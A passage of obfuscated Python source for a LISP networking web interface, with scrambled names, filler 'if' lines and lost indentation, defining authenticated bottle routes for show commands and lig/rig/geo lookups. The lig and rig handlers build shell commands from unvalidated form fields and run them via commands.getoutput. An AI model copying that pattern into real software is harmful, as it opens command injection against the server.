i1I1ii = lisp . lisp_print_sans ( "{} cleared" . format ( I1IIIIiii1i ) )
return ( lispconfig . lisp_show_wrapper ( i1I1ii ) )
if 25 - 25: oO0o
if 34 - 34: OoOoOO00 . iIii1I11I1II1 % O0
if 43 - 43: I1ii11iIi11i - iII111i
if 70 - 70: iII111i / OOooOOo % ooOoO0o - Ii1I
if 47 - 47: iII111i
if 92 - 92: OOooOOo + OoOoOO00 % i1IIi
if 23 - 23: I1Ii111 - OOooOOo + Ii1I - OoOoOO00 * OoOoOO00 . Oo0Ooo
@ bottle . route ( '/lisp/show/map-server' )
def iIii11iI1II ( ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( oOO00O ( ) )
if 42 - 42: ooOoO0o - I1IiiI + I1ii11iIi11i % Ii1I
if 44 - 44: i1IIi - O0 - I1ii11iIi11i * I1ii11iIi11i + OoOoOO00
return ( lispconfig . lisp_process_show_command ( Oo ,
"show map-server" ) )
if 56 - 56: ooOoO0o / iIii1I11I1II1 . Ii1I % OoOoOO00 + OOooOOo
if 10 - 10: I1Ii111 * i11iIiiIii - iIii1I11I1II1 . Oo0Ooo - I1ii11iIi11i
if 20 - 20: I1ii11iIi11i / I1IiiI * OoO0O00 * I1IiiI * O0
if 1 - 1: iIii1I11I1II1 + Oo0Ooo / O0 - iII111i % IiII + IiII
if 24 - 24: I1IiiI + Oo0Ooo + OOooOOo - OoooooooOO + Oo0Ooo
if 93 - 93: ooOoO0o . iIii1I11I1II1 % i11iIiiIii . OoOoOO00 % ooOoO0o + O0
if 65 - 65: Ii1I + OoO0O00 - OoooooooOO
@ bottle . route ( '/lisp/show/database' )
def OOoOO0o ( ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( oOO00O ( ) )
if 51 - 51: Oo0Ooo - I1ii11iIi11i * I11i
return ( lispconfig . lisp_process_show_command ( Oo ,
"show database-mapping" ) )
if 12 - 12: iIii1I11I1II1 % ooOoO0o % ooOoO0o
if 78 - 78: IiII . OoOoOO00 . I11i
if 97 - 97: oO0o
if 80 - 80: I1IiiI . Ii1I
if 47 - 47: I11i + ooOoO0o + II111iiii % i11iIiiIii
if 93 - 93: I1ii11iIi11i % OoOoOO00 . O0 / iII111i * oO0o
if 29 - 29: o0oOOo0O0Ooo
@ bottle . route ( '/lisp/show/itr/map-cache' )
def oo0iIiI ( ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( oOO00O ( ) )
if 81 - 81: OoOoOO00 % Ii1I
return ( lispconfig . lisp_process_show_command ( Oo ,
"show itr-map-cache" ) )
if 87 - 87: iIii1I11I1II1 . OoooooooOO * OoOoOO00
if 100 - 100: OoO0O00 / i1IIi - I1IiiI % Ii1I - iIii1I11I1II1
if 17 - 17: I11i / o0oOOo0O0Ooo % Oo0Ooo
if 71 - 71: IiII . I1Ii111 . OoO0O00
if 68 - 68: i11iIiiIii % oO0o * OoO0O00 * IiII * II111iiii + O0
if 66 - 66: I11i % I1ii11iIi11i % OoooooooOO
if 34 - 34: o0oOOo0O0Ooo / iII111i % O0 . OoO0O00 . i1IIi
@ bottle . route ( '/lisp/show/itr/rloc-probing' )
def ii ( ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( oOO00O ( ) )
if 94 - 94: ooOoO0o * I11i - IiII . iIii1I11I1II1
return ( lispconfig . lisp_process_show_command ( Oo ,
"show itr-rloc-probing" ) )
if 66 - 66: ooOoO0o - OOooOOo * OoOoOO00 / oO0o * II111iiii * OoO0O00
if 91 - 91: OoooooooOO / Ii1I . I1IiiI + ooOoO0o . II111iiii
if 45 - 45: oO0o * OoOoOO00 / iIii1I11I1II1
if 77 - 77: I1Ii111 - I11i
if 11 - 11: I1ii11iIi11i
if 26 - 26: iIii1I11I1II1 * I1Ii111 - OOooOOo
if 27 - 27: I1ii11iIi11i * I1Ii111 - OoO0O00 + Ii1I * Ii1I
@ bottle . post ( '/lisp/show/itr/map-cache/lookup' )
def o0OO0O0OO0oO0 ( ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( oOO00O ( ) )
if 9 - 9: oO0o % i11iIiiIii / Oo0Ooo
if 20 - 20: oO0o * O0 + I11i - OoooooooOO . I11i
oO = bottle . request . forms . get ( "eid" )
if ( lispconfig . lisp_validate_input_address_string ( oO ) == False ) :
i1I1ii = "Address '{}' has invalid format" . format ( oO )
i1I1ii = lisp . lisp_print_sans ( i1I1ii )
return ( lispconfig . lisp_show_wrapper ( i1I1ii ) )
if 31 - 31: OoO0O00 * i11iIiiIii * Ii1I . i11iIiiIii
if 12 - 12: OoOoOO00 % IiII % I1ii11iIi11i . i11iIiiIii * iIii1I11I1II1
OOoOO0o0o0 = "show itr-map-cache" + "%" + oO
return ( lispconfig . lisp_process_show_command ( Oo ,
OOoOO0o0o0 ) )
if 66 - 66: i11iIiiIii * iIii1I11I1II1 % OoooooooOO
if 5 - 5: OoOoOO00 % OoooooooOO
if 60 - 60: OoOoOO00 . i1IIi % OoO0O00 % ooOoO0o % OOooOOo
if 33 - 33: iIii1I11I1II1 - Ii1I * I1ii11iIi11i % iIii1I11I1II1 + OoO0O00 . OOooOOo
if 56 - 56: i11iIiiIii * iII111i . oO0o
if 78 - 78: OoOoOO00
if 1 - 1: OOooOOo . IiII
@ bottle . route ( '/lisp/show/rtr/map-cache' )
@ bottle . route ( '/lisp/show/rtr/map-cache/<dns>' )
def I1iIII1IiiI ( dns = "" ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( oOO00O ( ) )
if 96 - 96: I1IiiI % i1IIi . o0oOOo0O0Ooo . O0
if 37 - 37: i1IIi - OOooOOo % OoooooooOO / OOooOOo % ooOoO0o
if ( dns == "dns" ) :
return ( lispconfig . lisp_process_show_command ( Oo ,
"show rtr-map-cache-dns" ) )
else :
return ( lispconfig . lisp_process_show_command ( Oo ,
"show rtr-map-cache" ) )
if 48 - 48: i11iIiiIii % oO0o
if 29 - 29: iII111i + i11iIiiIii % I11i
if 93 - 93: OoOoOO00 % iIii1I11I1II1
if 90 - 90: I1IiiI - OOooOOo / Ii1I / O0 / I11i
if 87 - 87: OoOoOO00 / IiII + iIii1I11I1II1
if 93 - 93: iIii1I11I1II1 + oO0o % ooOoO0o
if 21 - 21: OOooOOo
if 6 - 6: IiII
@ bottle . route ( '/lisp/show/rtr/rloc-probing' )
def i1I1II ( ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( oOO00O ( ) )
if 17 - 17: O0 * OoOoOO00 * I1ii11iIi11i * II111iiii * I11i % i1IIi
return ( lispconfig . lisp_process_show_command ( Oo ,
"show rtr-rloc-probing" ) )
if 33 - 33: I1ii11iIi11i * I1ii11iIi11i . ooOoO0o . i11iIiiIii
if 48 - 48: o0oOOo0O0Ooo . Ii1I + OoOoOO00 % I1ii11iIi11i / i11iIiiIii
if 74 - 74: II111iiii . O0 - I1IiiI + IiII % i11iIiiIii % OoOoOO00
if 78 - 78: Ii1I + OoOoOO00 + IiII - IiII . i11iIiiIii / OoO0O00
if 27 - 27: Ii1I - O0 % I11i * I1Ii111 . IiII % iIii1I11I1II1
if 37 - 37: OoooooooOO + O0 - i1IIi % ooOoO0o
if 24 - 24: OoOoOO00
@ bottle . post ( '/lisp/show/rtr/map-cache/lookup' )
def Oo0oOo0ooOOOo ( ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( oOO00O ( ) )
if 71 - 71: II111iiii - Ii1I - iII111i * O0 * IiII
if 46 - 46: IiII
oO = bottle . request . forms . get ( "eid" )
if ( lispconfig . lisp_validate_input_address_string ( oO ) == False ) :
i1I1ii = "Address '{}' has invalid format" . format ( oO )
i1I1ii = lisp . lisp_print_sans ( i1I1ii )
return ( lispconfig . lisp_show_wrapper ( i1I1ii ) )
if 29 - 29: II111iiii . OoOoOO00 % o0oOOo0O0Ooo * II111iiii - o0oOOo0O0Ooo * iIii1I11I1II1
if 35 - 35: II111iiii - IiII . i1IIi
OOoOO0o0o0 = "show rtr-map-cache" + "%" + oO
return ( lispconfig . lisp_process_show_command ( Oo ,
OOoOO0o0o0 ) )
if 95 - 95: I1IiiI + I1IiiI - OOooOOo - iII111i
if 45 - 45: Ii1I . OoooooooOO
if 27 - 27: Ii1I * Oo0Ooo . OoOoOO00
if 17 - 17: II111iiii % iII111i * OOooOOo % i1IIi . I1IiiI . iIii1I11I1II1
if 27 - 27: i11iIiiIii - I1IiiI
if 35 - 35: OoooooooOO - I1Ii111 / OoO0O00
if 50 - 50: OoOoOO00
@ bottle . route ( '/lisp/show/referral' )
def i1i1Ii11Ii ( ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( oOO00O ( ) )
if 57 - 57: OOooOOo + I1Ii111 % I1ii11iIi11i . OoO0O00 / OoO0O00 * O0
return ( lispconfig . lisp_process_show_command ( Oo ,
"show referral-cache" ) )
if 6 - 6: i1IIi - II111iiii * o0oOOo0O0Ooo . OoO0O00
if 68 - 68: o0oOOo0O0Ooo
if 20 - 20: I1Ii111 - I1Ii111
if 37 - 37: IiII
if 37 - 37: Oo0Ooo / IiII * O0
if 73 - 73: iII111i * iII111i / ooOoO0o
if 43 - 43: I1ii11iIi11i . i1IIi . IiII + O0 * Ii1I * O0
@ bottle . post ( '/lisp/show/referral/lookup' )
def II11ii ( ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( oOO00O ( ) )
if 39 - 39: iII111i . I1IiiI * OoOoOO00 - i11iIiiIii
if 1 - 1: iII111i * OoOoOO00
oO = bottle . request . forms . get ( "eid" )
if ( lispconfig . lisp_validate_input_address_string ( oO ) == False ) :
i1I1ii = "Address '{}' has invalid format" . format ( oO )
i1I1ii = lisp . lisp_print_sans ( i1I1ii )
return ( lispconfig . lisp_show_wrapper ( i1I1ii ) )
if 66 - 66: OoOoOO00 + i1IIi % II111iiii . O0 * I1ii11iIi11i % I1ii11iIi11i
if 87 - 87: OOooOOo + o0oOOo0O0Ooo . iII111i - OoooooooOO
OOoOO0o0o0 = "show referral-cache" + "%" + oO
return ( lispconfig . lisp_process_show_command ( Oo , OOoOO0o0o0 ) )
if 6 - 6: iIii1I11I1II1 * OoooooooOO
if 28 - 28: Oo0Ooo * o0oOOo0O0Ooo / I1Ii111
if 52 - 52: O0 / o0oOOo0O0Ooo % iII111i * I1IiiI % OOooOOo
if 69 - 69: I1ii11iIi11i
if 83 - 83: o0oOOo0O0Ooo
if 38 - 38: I1Ii111 + OoooooooOO . i1IIi
if 19 - 19: iII111i - o0oOOo0O0Ooo - Ii1I - OoOoOO00 . iII111i . I1Ii111
@ bottle . route ( '/lisp/show/delegations' )
def i11I1I ( ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( oOO00O ( ) )
if 71 - 71: iII111i
return ( lispconfig . lisp_process_show_command ( Oo ,
"show delegations" ) )
if 23 - 23: i1IIi . iIii1I11I1II1 . OOooOOo . O0 % Ii1I % i11iIiiIii
if 11 - 11: O0 - II111iiii . OOooOOo . Ii1I % I1Ii111
if 21 - 21: Oo0Ooo / iII111i . I1Ii111 * OoooooooOO + I11i - i1IIi
if 58 - 58: I1ii11iIi11i
if 2 - 2: II111iiii / I1Ii111
if 54 - 54: i1IIi . I11i - I1ii11iIi11i + ooOoO0o + Oo0Ooo / Oo0Ooo
if 22 - 22: ooOoO0o . iIii1I11I1II1
@ bottle . post ( '/lisp/show/delegations/lookup' )
def i1IiiiiIi1I ( ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( oOO00O ( ) )
if 56 - 56: OoooooooOO * O0
if 85 - 85: OoooooooOO % OoOoOO00 * iIii1I11I1II1
oO = bottle . request . forms . get ( "eid" )
if ( lispconfig . lisp_validate_input_address_string ( oO ) == False ) :
i1I1ii = "Address '{}' has invalid format" . format ( oO )
i1I1ii = lisp . lisp_print_sans ( i1I1ii )
return ( lispconfig . lisp_show_wrapper ( i1I1ii ) )
if 44 - 44: iIii1I11I1II1 . I1ii11iIi11i + I1Ii111 . ooOoO0o
if 7 - 7: I1ii11iIi11i + iIii1I11I1II1 * I11i * I11i / II111iiii - Ii1I
OOoOO0o0o0 = "show delegations" + "%" + oO
return ( lispconfig . lisp_process_show_command ( Oo , OOoOO0o0o0 ) )
if 65 - 65: oO0o + OoOoOO00 + II111iiii
if 77 - 77: II111iiii
if 50 - 50: O0 . O0 . ooOoO0o % Oo0Ooo
if 68 - 68: oO0o
if 10 - 10: Ii1I
if 77 - 77: OOooOOo / II111iiii + IiII + ooOoO0o - i11iIiiIii
if 44 - 44: I1IiiI + OoOoOO00 + I1ii11iIi11i . I1IiiI * OoOoOO00 % iIii1I11I1II1
if 72 - 72: OOooOOo . OOooOOo - I1ii11iIi11i
if 48 - 48: Oo0Ooo - ooOoO0o + Oo0Ooo - I1IiiI * i11iIiiIii . iII111i
@ bottle . route ( '/lisp/show/site' )
@ bottle . route ( '/lisp/show/site/<eid_prefix>' )
def I1 ( eid_prefix = "" ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( oOO00O ( ) )
if 35 - 35: I1IiiI
if 36 - 36: i1IIi - I1ii11iIi11i - I1Ii111
OOoOO0o0o0 = "show site"
if 7 - 7: i11iIiiIii + I1IiiI
if ( eid_prefix != "" ) :
OOoOO0o0o0 = lispconfig . lisp_parse_eid_in_url ( OOoOO0o0o0 , eid_prefix )
if 47 - 47: I1Ii111 - OOooOOo / ooOoO0o - Oo0Ooo + iII111i - iIii1I11I1II1
return ( lispconfig . lisp_process_show_command ( Oo , OOoOO0o0o0 ) )
if 68 - 68: Ii1I - oO0o + Oo0Ooo
if 44 - 44: Ii1I * o0oOOo0O0Ooo * II111iiii
if 5 - 5: i1IIi + O0 % O0 * O0 + OoOoOO00 % i1IIi
if 80 - 80: iII111i / o0oOOo0O0Ooo + OoO0O00 / oO0o
if 46 - 46: i11iIiiIii / IiII % i1IIi - I11i * OoOoOO00
if 94 - 94: Ii1I - I1ii11iIi11i + o0oOOo0O0Ooo - Oo0Ooo
if 15 - 15: OOooOOo
@ bottle . route ( '/lisp/show/itr/dynamic-eid/<eid_prefix>' )
def i1iiI ( eid_prefix = "" ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( oOO00O ( ) )
if 83 - 83: oO0o / iIii1I11I1II1 + i1IIi / iII111i
if 47 - 47: oO0o + OoooooooOO . II111iiii . iII111i
OOoOO0o0o0 = "show itr-dynamic-eid"
if 66 - 66: ooOoO0o * OoOoOO00
if ( eid_prefix != "" ) :
OOoOO0o0o0 = lispconfig . lisp_parse_eid_in_url ( OOoOO0o0o0 , eid_prefix )
if 2 - 2: oO0o . I1Ii111 * Oo0Ooo + O0 - I11i * iIii1I11I1II1
return ( lispconfig . lisp_process_show_command ( Oo , OOoOO0o0o0 ) )
if 12 - 12: o0oOOo0O0Ooo * I1Ii111 % II111iiii * i1IIi * iIii1I11I1II1
if 81 - 81: Oo0Ooo - I11i
if 24 - 24: OoooooooOO . OoO0O00 * II111iiii
if 59 - 59: I1Ii111 + OoO0O00 / OOooOOo
if 97 - 97: Oo0Ooo * iII111i % ooOoO0o . iII111i - I1Ii111 - OOooOOo
if 79 - 79: I1IiiI - ooOoO0o
if 37 - 37: IiII . Oo0Ooo * Oo0Ooo * II111iiii * O0
@ bottle . route ( '/lisp/show/etr/dynamic-eid/<eid_prefix>' )
def o00OOo000O ( eid_prefix = "" ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( oOO00O ( ) )
if 42 - 42: IiII % iII111i % o0oOOo0O0Ooo % oO0o + I11i % OoOoOO00
if 3 - 3: oO0o
OOoOO0o0o0 = "show etr-dynamic-eid"
if 64 - 64: OoO0O00 . I1IiiI - OoooooooOO . ooOoO0o - iII111i
if ( eid_prefix != "" ) :
OOoOO0o0o0 = lispconfig . lisp_parse_eid_in_url ( OOoOO0o0o0 , eid_prefix )
if 77 - 77: Ii1I % OoOoOO00 / II111iiii % iII111i % OoooooooOO % OoO0O00
return ( lispconfig . lisp_process_show_command ( Oo , OOoOO0o0o0 ) )
if 19 - 19: IiII * I1Ii111 / oO0o * I1Ii111 - OoooooooOO * I11i
if 17 - 17: II111iiii + Oo0Ooo . I1Ii111
if 12 - 12: I1Ii111 + OOooOOo + I11i . IiII / Ii1I
if 29 - 29: IiII . ooOoO0o - II111iiii
if 68 - 68: iIii1I11I1II1 + II111iiii / oO0o
if 91 - 91: OoOoOO00 % iIii1I11I1II1 . I1IiiI
if 70 - 70: I11i % II111iiii % O0 . i1IIi / I1Ii111
@ bottle . post ( '/lisp/show/site/lookup' )
def OO0ooOoOO0OOo ( ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( oOO00O ( ) )
if 51 - 51: iIii1I11I1II1 * o0oOOo0O0Ooo / iIii1I11I1II1 . iIii1I11I1II1 . iII111i * I11i
if 93 - 93: oO0o * Ii1I
oO = bottle . request . forms . get ( "eid" )
if ( lispconfig . lisp_validate_input_address_string ( oO ) == False ) :
i1I1ii = "Address '{}' has invalid format" . format ( oO )
i1I1ii = lisp . lisp_print_sans ( i1I1ii )
return ( lispconfig . lisp_show_wrapper ( i1I1ii ) )
if 27 - 27: I1IiiI * ooOoO0o
if 77 - 77: IiII
OOoOO0o0o0 = "show site" + "%" + oO + "@lookup"
return ( lispconfig . lisp_process_show_command ( Oo , OOoOO0o0o0 ) )
if 66 - 66: iIii1I11I1II1 . i11iIiiIii / I11i / ooOoO0o + I1Ii111
if 5 - 5: OoOoOO00 % iII111i + IiII
if 13 - 13: IiII
if 19 - 19: II111iiii - IiII
if 59 - 59: o0oOOo0O0Ooo * OoO0O00 - Ii1I . OOooOOo
if 89 - 89: OOooOOo
if 69 - 69: ooOoO0o - OoooooooOO * O0
@ bottle . post ( '/lisp/lig' )
def O0Oo0O0 ( ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( oOO00O ( ) )
if 33 - 33: ooOoO0o % i1IIi - oO0o . O0 / O0
if 96 - 96: OoooooooOO + IiII * O0
oo0OoOO0o0o = bottle . request . forms . get ( "eid" )
OO0OOO00 = bottle . request . forms . get ( "mr" )
ooOOo0o = bottle . request . forms . get ( "count" )
IiI1Iii1 = "no-info" if bottle . request . forms . get ( "no-nat" ) == "yes" else ""
if 85 - 85: i11iIiiIii / i11iIiiIii . OoO0O00 . O0
if 67 - 67: II111iiii / o0oOOo0O0Ooo . OOooOOo . OoooooooOO
if 19 - 19: IiII . I1ii11iIi11i / OoOoOO00
if 68 - 68: ooOoO0o / OoooooooOO * I11i / oO0o
if ( OO0OOO00 == "" ) : OO0OOO00 = "localhost"
if 88 - 88: o0oOOo0O0Ooo
if 1 - 1: OoooooooOO
if 48 - 48: ooOoO0o * OoOoOO00 - ooOoO0o - OOooOOo + OOooOOo
if 40 - 40: i11iIiiIii . iIii1I11I1II1
if ( oo0OoOO0o0o == "" ) :
i1I1ii = "Need to supply EID address"
return ( lispconfig . lisp_show_wrapper ( lisp . lisp_print_cour ( i1I1ii ) ) )
if 2 - 2: i1IIi * oO0o - oO0o + OoooooooOO % OoOoOO00 / OoOoOO00
if 3 - 3: OoooooooOO
O0OoO0o = ""
if os . path . exists ( "lisp-lig.pyo" ) : O0OoO0o = "-O lisp-lig.pyo"
if os . path . exists ( "lisp-lig.py" ) : O0OoO0o = "lisp-lig.py"
if 1 - 1: ooOoO0o % I11i * I1ii11iIi11i - II111iiii
if 49 - 49: oO0o - iII111i % OoOoOO00
if 72 - 72: I1IiiI + IiII . OoOoOO00 + OoOoOO00
if 94 - 94: i11iIiiIii % OoooooooOO / I1IiiI
if ( O0OoO0o == "" ) :
i1I1ii = "Cannot find lisp-lig.py or lisp-lig.pyo"
return ( lispconfig . lisp_show_wrapper ( lisp . lisp_print_cour ( i1I1ii ) ) )
if 24 - 24: I1IiiI * oO0o
if 85 - 85: II111iiii . ooOoO0o % OOooOOo % I11i
if ( ooOOo0o != "" ) : ooOOo0o = "count {}" . format ( ooOOo0o )
if 80 - 80: oO0o * I11i / iIii1I11I1II1 % oO0o / iIii1I11I1II1
OOoOO0o0o0 = 'python {} "{}" to {} {} {}' . format ( O0OoO0o , oo0OoOO0o0o , OO0OOO00 , ooOOo0o , IiI1Iii1 )
if 42 - 42: i1IIi / i11iIiiIii . Oo0Ooo * iII111i . i11iIiiIii * O0
i1I1ii = commands . getoutput ( OOoOO0o0o0 )
i1I1ii = i1I1ii . replace ( "\n" , "<br>" )
i1I1ii = lisp . convert_font ( i1I1ii )
if 44 - 44: i1IIi . I1IiiI / i11iIiiIii + IiII
iI111II1ii = lisp . space ( 2 ) + "RLOC:"
i1I1ii = i1I1ii . replace ( "RLOC:" , iI111II1ii )
O0ooO00ooOO0o = lisp . space ( 2 ) + "Empty,"
i1I1ii = i1I1ii . replace ( "Empty," , O0ooO00ooOO0o )
I1i = lisp . space ( 4 ) + "geo:"
i1I1ii = i1I1ii . replace ( "geo:" , I1i )
o0O = lisp . space ( 4 ) + "elp:"
i1I1ii = i1I1ii . replace ( "elp:" , o0O )
I1II = lisp . space ( 4 ) + "rle:"
i1I1ii = i1I1ii . replace ( "rle:" , I1II )
return ( lispconfig . lisp_show_wrapper ( lisp . lisp_print_cour ( i1I1ii ) ) )
if 9 - 9: Oo0Ooo % OoooooooOO - Ii1I
if 43 - 43: OoO0O00 % OoO0O00
if 46 - 46: Oo0Ooo % iIii1I11I1II1 . iII111i . O0 * ooOoO0o / OoooooooOO
if 7 - 7: oO0o - O0 * I11i - o0oOOo0O0Ooo - II111iiii
if 41 - 41: I1IiiI - I1Ii111 % II111iiii . I1Ii111 - I11i
if 45 - 45: Ii1I - OOooOOo
if 70 - 70: OoO0O00 % I1IiiI / I1IiiI . I11i % ooOoO0o . II111iiii
@ bottle . post ( '/lisp/rig' )
def I1ii1Ii1 ( ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( oOO00O ( ) )
if 73 - 73: O0 . oO0o + i11iIiiIii + iIii1I11I1II1 - I11i / OoOoOO00
if 99 - 99: I1ii11iIi11i * oO0o * I1ii11iIi11i - II111iiii + Ii1I
oo0OoOO0o0o = bottle . request . forms . get ( "eid" )
OOooO0Oo00 = bottle . request . forms . get ( "ddt" )
iIIIIIIIiIII = "follow-all-referrals" if bottle . request . forms . get ( "follow" ) == "yes" else ""
if 94 - 94: iII111i * iIii1I11I1II1 . I11i
if 13 - 13: iIii1I11I1II1 * OoOoOO00 / I1Ii111 % ooOoO0o + oO0o
if 41 - 41: I1ii11iIi11i
if 5 - 5: Oo0Ooo
if 100 - 100: Ii1I + iIii1I11I1II1
if ( OOooO0Oo00 == "" ) : OOooO0Oo00 = "localhost"
if 59 - 59: IiII
if 89 - 89: OoOoOO00 % iIii1I11I1II1
if 35 - 35: I1ii11iIi11i + I1Ii111 - OoOoOO00 % oO0o % o0oOOo0O0Ooo % OoOoOO00
if 45 - 45: I1IiiI * OOooOOo % OoO0O00
if ( oo0OoOO0o0o == "" ) :
i1I1ii = "Need to supply EID address"
return ( lispconfig . lisp_show_wrapper ( lisp . lisp_print_cour ( i1I1ii ) ) )
if 24 - 24: ooOoO0o - I11i * oO0o
if 87 - 87: Ii1I - I1ii11iIi11i % I1ii11iIi11i . oO0o / I1ii11iIi11i
II1io0 = ""
if os . path . exists ( "lisp-rig.pyo" ) : II1io0 = "-O lisp-rig.pyo"
if os . path . exists ( "lisp-rig.py" ) : II1io0 = "lisp-rig.py"
if 25 - 25: OoO0O00 * oO0o % i11iIiiIii + i11iIiiIii * OoO0O00
if 42 - 42: II111iiii / O0 . iIii1I11I1II1 / O0 / OoO0O00 / OoooooooOO
if 62 - 62: O0 . Oo0Ooo
if 33 - 33: Oo0Ooo / iIii1I11I1II1 % i1IIi
if ( II1io0 == "" ) :
i1I1ii = "Cannot find lisp-rig.py or lisp-rig.pyo"
return ( lispconfig . lisp_show_wrapper ( lisp . lisp_print_cour ( i1I1ii ) ) )
if 76 - 76: Ii1I + iIii1I11I1II1 + OoOoOO00 . OoO0O00
if 49 - 49: IiII / ooOoO0o / OOooOOo
OOoOO0o0o0 = 'python {} "{}" to {} {}' . format ( II1io0 , oo0OoOO0o0o , OOooO0Oo00 , iIIIIIIIiIII )
if 25 - 25: I1IiiI % O0 + i1IIi - ooOoO0o
i1I1ii = commands . getoutput ( OOoOO0o0o0 )
i1I1ii = i1I1ii . replace ( "\n" , "<br>" )
i1I1ii = lisp . convert_font ( i1I1ii )
if 38 - 38: o0oOOo0O0Ooo % I1Ii111 + i11iIiiIii + iII111i + ooOoO0o / i11iIiiIii
o0OOOOOo0 = lisp . space ( 2 ) + "Referrals:"
i1I1ii = i1I1ii . replace ( "Referrals:" , o0OOOOOo0 )
return ( lispconfig . lisp_show_wrapper ( lisp . lisp_print_cour ( i1I1ii ) ) )
if 57 - 57: iIii1I11I1II1 + iIii1I11I1II1
if 56 - 56: oO0o + ooOoO0o
if 32 - 32: II111iiii + OoOoOO00 % ooOoO0o / OoOoOO00 + I1ii11iIi11i
if 2 - 2: i11iIiiIii - I1Ii111 + OoO0O00 % I11i * Ii1I
if 54 - 54: O0 - iII111i . OOooOOo % iII111i + iII111i
if 36 - 36: OOooOOo % i11iIiiIii
if 47 - 47: i1IIi + II111iiii . Oo0Ooo * oO0o . I11i / i1IIi
if 50 - 50: I1Ii111 / i1IIi % OoooooooOO
def oOOOOO0Ooooo ( eid1 , eid2 ) :
O0OoO0o = None
if os . path . exists ( "lisp-lig.pyo" ) : O0OoO0o = "-O lisp-lig.pyo"
if os . path . exists ( "lisp-lig.py" ) : O0OoO0o = "lisp-lig.py"
if ( O0OoO0o == None ) : return ( [ None , None ] )
if 57 - 57: Ii1I - OoooooooOO
if 68 - 68: o0oOOo0O0Ooo % I1ii11iIi11i / I1Ii111 + I1Ii111 - I1Ii111 . OoO0O00
if 100 - 100: OoOoOO00 % Oo0Ooo
if 76 - 76: II111iiii / OoO0O00 + OoooooooOO . I1ii11iIi11i . I11i . ooOoO0o
iiiI = commands . getoutput ( "egrep -A 2 'lisp map-resolver {' ./lisp.config" )
OO0OOO00 = None
for I1I1 in [ "address = " , "dns-name = " ] :
OO0OOO00 = None
iIIIiiiIiI1 = iiiI . find ( I1I1 )
if ( iIIIiiiIiI1 == - 1 ) : continue
OO0OOO00 = iiiI [ iIIIiiiIiI1 + len ( I1I1 ) : : ]
iIIIiiiIiI1 = OO0OOO00 . find ( "\n" )
if ( iIIIiiiIiI1 == - 1 ) : continue
OO0OOO00 = OO0OOO00 [ 0 : iIIIiiiIiI1 ]
break
if 95 - 95: Ii1I - I1ii11iIi11i - O0 . I1IiiI . iII111i
if ( OO0OOO00 == None ) : return ( [ None , None ] )
if 7 - 7: I1Ii111
if 45 - 45: O0 - OOooOOo
if 56 - 56: O0 + Ii1I
if 24 - 24: i11iIiiIii - Ii1I + oO0o * I1IiiI
OoooOo0 = lisp . lisp_address ( lisp . LISP_AFI_NONE , "" , 0 , 0 )
IiI1Ii1ii = [ ]
for oo0OoOO0o0o in [ eid1 , eid2 ] :
if 44 - 44: I1IiiI % Ii1I * I1IiiI . Oo0Ooo + I1ii11iIi11i . OOooOOo
if 6 - 6: IiII * OoooooooOO + I1Ii111 / Ii1I
if 35 - 35: ooOoO0o % I1IiiI - ooOoO0o - OoO0O00 - OoooooooOO
if 46 - 46: i1IIi . i1IIi . oO0o / I11i / ooOoO0o
if 34 - 34: OoooooooOO / Oo0Ooo * i11iIiiIii . II111iiii . OoooooooOO
if ( OoooOo0 . is_geo_string ( oo0OoOO0o0o ) ) :
IiI1Ii1ii . append ( oo0OoOO0o0o )
continue
if 59 - 59: i11iIiiIii . OoooooooOO / I11i * I1ii11iIi11i + OoooooooOO
if 3 - 3: i11iIiiIii * Oo0Ooo % iIii1I11I1II1 % I1IiiI * iII111i / OOooOOo
OOoOO0o0o0 = 'python {} "{}" to {} count 1' . format ( O0OoO0o , oo0OoOO0o0o , OO0OOO00 )
for IIiI1Ii in [ OOoOO0o0o0 , OOoOO0o0o0 + " no-info" ] :
i1I1ii = commands . getoutput ( OOoOO0o0o0 )
iIIIiiiIiI1 = i1I1ii . find ( "geo: " )
if ( iIIIiiiIiI1 == - 1 ) :
if ( IIiI1Ii != OOoOO0o0o0 ) : IiI1Ii1ii . append ( None )
continue
if 95 - 95: IiII * O0 * I1Ii111 . OoooooooOO % Oo0Ooo + I1ii11iIi11i
i1I1ii = i1I1ii [ iIIIiiiIiI1 + len ( "geo: " ) : : ]
iIIIiiiIiI1 = i1I1ii . find ( "\n" )
if ( iIIIiiiIiI1 == - 1 ) :
if ( IIiI1Ii != OOoOO0o0o0 ) : IiI1Ii1ii . append ( None )
continue
if 98 - 98: oO0o . OoooooooOO
IiI1Ii1ii . append ( i1I1ii [ 0 : iIIIiiiIiI1 ] )
break
if 54 - 54: O0 / IiII % ooOoO0o * i1IIi * O0
if 48 - 48: o0oOOo0O0Ooo . oO0o % OoOoOO00 - OoOoOO00
return ( IiI1Ii1ii )
if 33 - 33: I11i % II111iiii + OoO0O00
if 93 - 93: i1IIi . IiII / I1IiiI + IiII
if 58 - 58: I1ii11iIi11i + O0 . Oo0Ooo + OoOoOO00 - OoO0O00 - OoOoOO00
if 41 - 41: Oo0Ooo / i1IIi / Oo0Ooo - iII111i . o0oOOo0O0Ooo
if 65 - 65: O0 * i11iIiiIii . OoooooooOO / I1IiiI / iII111i
if 69 - 69: ooOoO0o % ooOoO0o
if 76 - 76: i11iIiiIii * iII111i / OoO0O00 % I1ii11iIi11i + OOooOOo
@ bottle . post ( '/lisp/geo' )
def IiIi1II111I ( ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( oOO00O ( ) )
if 80 - 80: Ii1I / OOooOOo
if 21 - 21: Oo0Ooo - iIii1I11I1II1 - I1Ii111
